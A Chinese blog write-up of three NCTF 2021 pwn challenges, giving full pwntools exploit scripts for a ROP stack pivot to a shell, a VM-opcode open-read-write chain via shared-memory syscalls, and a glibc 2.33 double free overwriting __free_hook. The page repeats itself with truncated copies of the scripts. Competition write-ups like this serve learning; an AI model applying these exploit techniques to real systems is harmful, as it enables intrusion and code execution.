[NCTF 2021] login, vmstack, ezheap

博主： cor1e
发布时间：2021 年 11 月 28 日
3281次浏览
12 条评论
4361字数
分类： CTF_WP

南邮小绿草办的比赛，题目比较友好，和学弟们组队拿下了第一，奖京东E卡捏🤠

## login

![](https://pic.imgdb.cn/item/61a652cd2ab3f51d91335ecb.png)

光秃秃，保护全开，ROP前关闭了stdout、stderr

构造栈迁移，然后选了close把它got的最低为写成'\\xa9'（这个libc版本下close函数中syscall指令的偏移）

接下来用read控rax，调close(syscall)

因为关闭了输出，所以远程getshell之后可以 `cat flag>&0`或者反弹shell

exp:

```python
from pwn import*

#p=process('./login',env={'LD_PRELOAD':'./libc-2.31.so'})
p=process('./login')
#p=remote('129.211.173.64',10005)
#libc=ELF('./libc-2.31.so')
elf=ELF('./login')
#context.log_level='debug'

def csu(func_ptr,rdi,rsi,rdx):
    payload=p64(0x40128a)+p64(0)+p64(1)+p64(rdi)+p64(rsi)+p64(rdx)+p64(func_ptr)+p64(0x401270)
    payload+=p64(0)*7
    return payload

main_addr=0x4011ed
ret_addr=0x401220
leave_ret=0x40121f
bss=0x404090
read_got=elf.got['read']
close_got=elf.got['close']

#gdb.attach(p,'b *0x40121f\nc\n')
p.recvuntil("Welcome to NCTF2021!")
p.send(b'a'*0x100+p64(bss+0x100)+p64(main_addr))

payload=csu(read_got,0,close_got,1)+csu(read_got,0,bss,59)+csu(close_got,bss,0,0)
p.send(payload[0:0x100]+p64(bss+0x400)+p64(main_addr))

p.send(b'a'*0x100+p64(bss+0x100+0x100)+p64(main_addr))

#gdb.attach(p,'b *0x40121f\nc\n')
payload=csu(read_got,0,close_got,1)+csu(read_got,0,bss,59)+csu(close_got,bss,0,0)
p.send(payload[0x100:].ljust(0x100,b'\x00')+p64(bss-0x8)+p64(leave_ret))

p.send(b'\xa9')
p.send(b'/bin/sh\x00'.ljust(59,b'\x00'))

p.interactive()
```

## vmstack

opcode题，保护全开，ban了execve

![](https://pic.imgdb.cn/item/61a658b92ab3f51d9137582c.png)

一开始思路卡在怎么leak elf/libc/stack地址，因为没leak就写不了字符串，就不能ORW。

想了半天感觉突破口在syscall之后的返回值上，开始想有啥系统调用能返回内存中的地址的，mmap参数要求多拼不起来，brk也不是

终于找到了共享内存相关的**shmget()**、**shmat()**。好起来了

exp:

```python
from pwn import*

p=process('./vmstack')
#p=remote('129.211.173.64',10001)
context.log_level='debug'

p.recvuntil("Input your op code:")

#push 29,1111,0x100,0666|IPC_CREAT; pop rdx,rsi,rdi,rax; syscall  shmget(key,size,shmflg)
payload=b'\x00'+p64(29)+b'\x00'+p64(1111)+b'\x00'+p64(0x100)+b'\x00'+p64(950)
payload+=b'\x09'+b'\x08'+b'\x07'+b'\x06'
payload+=b'\x0c'   
#push v18;pop rdi;push 30,0,0; pop rdx,rsi,rax; syscall  shmat(shm_id,shm_addr,0)
payload+=b'\x01'+b'\x07'
payload+=b'\x00'+p64(30)+b'\x00'+p64(0)+b'\x00'+p64(0)
payload+=b'\x09'+b'\x08'+b'\x06'
payload+=b'\x0c' 
#push v18;push v18;pop rsi;push 0,0,0x8; pop rdx,rdi,rax;push v18 syscall  read()
payload+=b'\x01'+b'\x01'+b'\x08'
payload+=b'\x00'+p64(0)+b'\x00'+p64(0)+b'\x00'+p64(0x8)
payload+=b'\x09'+b'\x07'+b'\x06'
payload+=b'\x0c'
#pop rdi;push rdi;push 2,0,0; pop rdx,rsi,rax; syscall  open()
payload+=b'\x07'+b'\x03'
payload+=b'\x00'+p64(2)+b'\x00'+p64(0)+b'\x00'+p64(0)
payload+=b'\x09'+b'\x08'+b'\x06'
payload+=b'\x0c'

#push v18;pop rdi;pop rsi;push rsi;push 0,0x30; pop rdx,rax; syscall  read()
payload+=b'\x01'+b'\x07'
payload+=b'\x08'+b'\x04'
payload+=b'\x00'+p64(0)+b'\x00'+p64(0x30)
payload+=b'\x09'+b'\x06'
payload+=b'\x0c'

#push 1,1; pop rdi,rax; syscall  write()
payload+=b'\x00'+p64(1)+b'\x00'+p64(1)
payload+=b'\x07'+b'\x06'
payload+=b'\x0c'

gdb.attach(p)
p.sendline(payload.ljust(0x1000,b'\x00'))

p.sendline(b'./flag\x00')
#p.recv()
p.interactive()
```

## ezheap

glibc2.33，我莫得环境，先整了个docker扒了个ld下来

简单double free，注意的点就是2.33的链表指针异或操作，这里free后可以view的话能算出异或前的两项的

exp:

```python
from pwn import*

#p=process('./ezheap',env={'LD_PRELOAD':'./libc-2.33.so'})
p=remote('129.211.173.64',10002)
libc=ELF('./libc-2.33.so')
#p=remote('129.211.173.64', 10002)
#context.log_level='debug'

def cmd(idx):
    p.sendlineafter(">> ",str(idx))
  
def alloc(size,content):
    cmd(1)
    p.sendlineafter("Size: ",str(size))
    p.sendlineafter("Content: ",content)

def edit(idx,content):
    cmd(2)
    p.sendlineafter("Index: ",str(idx))
    p.sendlineafter("Content: ",content)
  
def delete(idx):
    cmd(3)
    p.sendlineafter("Index: ",str(idx))
  
def show(idx):
    cmd(4)
    p.sendlineafter("Index: ",str(idx))

#leak
for i in range(10): #0-9
    alloc(0x80,b'a')
for i in range(9):
    delete(i)
show(1)
tmp=u64(p.recv(8))
ptr0_11=tmp>>36
ptr0_23=((ptr0_11<<24)^tmp)>>24
ptr0_35=((ptr0_23<<12)^tmp)>>12
heap_base=ptr0_35<<12
print("heap_base: ",hex(heap_base))
show(7)
leak_libc=u64(p.recv(8))
libc_base=leak_libc-0x1e0c00
print("libc_base: ",hex(libc_base))

#overlap
system=libc_base+libc.symbols['system']
free_hook=libc_base+libc.symbols['__free_hook']
print('free_hook: ',hex(free_hook))
alloc(0x80,b'a') #10
delete(8)
alloc(0x70,'a') #11
ptr_addr=heap_base+0x720
alloc(0x70,b'\x00'*0x8+p64(0x19)+p64(free_hook^(ptr_addr>>12))) #12
alloc(0x80,b'/bin/sh\x00') #13
alloc(0x80,p64(system)) #14

#gdb.attach(p)
delete(13)
p.interactive()
```

换了ld之后本地打不通远程能打通，猜测是环境变量问题。？

最后修改：2022 年 07 月 19 日 08 : 15 PM

12 条评论

1
January 27th, 2024 at 05:56 am

555

回复
1
January 27th, 2024 at 05:37 am

555

回复
1
January 1st, 2024 at 04:49 pm

555

回复
1
January 1st, 2024 at 08:54 am

555

回复
1. 1
  January 27th, 2024 at 05:10 am
  
  @1
  
  1
  
  回复
2. 1
  January 27th, 2024 at 05:10 am
  
  @1
  
  1
  
  回复
3. 1
  January 27th, 2024 at 05:10 am
  
  @1
  
  1
  
  回复
4. 1
  January 27th, 2024 at 05:08 am
  
  @1
  
  1
  
  回复
5. 1
  January 27th, 2024 at 05:08 am
  
  @1
  
  1
  
  回复
6. 1
  January 27th, 2024 at 05:08 am
  
  @1
  
  1
  
  回复
7. 1
  January 27th, 2024 at 05:07 am
  
  @1
  
  1
  
  回复
1
December 30th, 2023 at 10:23 am

555

回复

发表评论取消回复

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

[NCTF 2021] login, vmstack, ezheap

cor1e • 2021 年 11 月 28 日

南邮小绿草办的比赛，题目比较友好，和学弟们组队拿下了第一，奖京东E卡捏🤠

## login

![](https://pic.imgdb.cn/item/61a652cd2ab3f51d91335ecb.png)

光秃秃，保护全开，ROP前关闭了stdout、stderr

构造栈迁移，然后选了close把它got的最低为写成'\\xa9'（这个libc版本下close函数中syscall指令的偏移）

接下来用read控rax，调close(syscall)

因为关闭了输出，所以远程getshell之后可以 `cat flag>&0`或者反弹shell

exp:

```python
from pwn import*

#p=process('./login',env={'LD_PRELOAD':'./libc-2.31.so'})
p=process('./login')
#p=remote('129.211.173.64',10005)
#libc=ELF('./libc-2.31.so')
elf=ELF('./login')
#context.log_level='debug'

def csu(func_ptr,rdi,rsi,rdx):
    payload=p64(0x40128a)+p64(0)+p64(1)+p64(rdi)+p64(rsi)+p64(rdx)+p64(func_ptr)+p64(0x401270)
    payload+=p64(0)*7
    return payload

main_addr=0x4011ed
ret_addr=0x401220
leave_ret=0x40121f
bss=0x404090
read_got=elf.got['read']
close_got=elf.got['close']

#gdb.attach(p,'b *0x40121f\nc\n')
p.recvuntil("Welcome to NCTF2021!")
p.send(b'a'*0x100+p64(bss+0x100)+p64(main_addr))

payload=csu(read_got,0,close_got,1)+csu(read_got,0,bss,59)+csu(close_got,bss,0,0)
p.send(payload[0:0x100]+p64(bss+0x400)+p64(main_addr))

p.send(b'a'*0x100+p64(bss+0x100+0x100)+p64(main_addr))

#gdb.attach(p,'b *0x40121f\nc\n')
payload=csu(read_got,0,close_got,1)+csu(read_got,0,bss,59)+csu(close_got,bss,0,0)
p.send(payload[0x100:].ljust(0x100,b'\x00')+p64(bss-0x8)+p64(leave_ret))

p.send(b'\xa9')
p.send(b'/bin/sh\x00'.ljust(59,b'\x00'))

p.interactive()
```

## vmstack

opcode题，保护全开，ban了execve

![](https://pic.imgdb.cn/item/61a658b92ab3f51d9137582c.png)

一开始思路卡在怎么leak elf/libc/stack地址，因为没leak就写不了字符串，就不能ORW。

想了半天感觉突破口在syscall之后的返回值上，开始想有啥系统调用能返回内存中的地址的，mmap参数要求多拼不起来，brk也不是

终于找到了共享内存相关的**shmget()**、**shmat()**。好起来了

exp:

```python
from pwn import*

p=process('./vmstack')
#p=remote('129.211.173.64',10001)
context.log_level='debug'

p.recvuntil("Input your op code:")

#push 1,1; pop rdi,rax; syscall  write()
payload+=b'\x00'+p64(1)+b'\x00'+p64(1)
payload+=b'\x07'+b'\x06'
payload+=b'\x0c'

gdb.attach(p)
p.sendline(payload.ljust(0x1000,b'\x00'))

p.sendline(b'./flag\x00')
#p.recv()
p.interactive()
```

## ezheap

glibc2.33，我莫得环境，先整了个docker扒了个ld下来

简单double free，注意的点就是2.33的链表指针异或操作，这里free后可以view的话能算出异或前的两项的

exp:

```python
from pwn import*

#p=process('./ezheap',env={'LD_PRELOAD':'./libc-2.33.so'})
p=remote('129.211.173.64',10002)
libc=ELF('./libc-2.33.so')
#p=remote('129.211.173.64', 10002)
#context.log_level='debug'

def cmd(idx):
    p.sendlineafter(">> ",str(idx))
  
def alloc(size,content):
    cmd(1)
    p.sendlineafter("Size: ",str(size))
    p.sendlineafter("Content: ",content)

#gdb.attach(p)
delete(13)
p.interactive()
```

换了ld之后本地打不通远程能打通，猜测是环境变量问题。？

[NCTF 2021] login, vmstack, ezheap

12 条评论

发表评论取消回复

[TCTF 2021 Final] securejit2

[RCTF 2021] ezheap, sharing

[HITCTF 2021] silent, babyrc, babyvm

两个简易的使用nonebot2框架的qq机器人插件

部署在github上的hexo主题博客 1

部署在github上的hexo主题博客 1

[RCTF 2021] ezheap, sharing

[HITCTF 2021] silent, babyrc, babyvm

[*CTF 2022] babynote

glibc的TLS实现中的相关结构体浅析

[NCTF 2021] login, vmstack, ezheap

12 条评论

发表评论 取消回复

[NCTF 2021] login, vmstack, ezheap

发表评论取消回复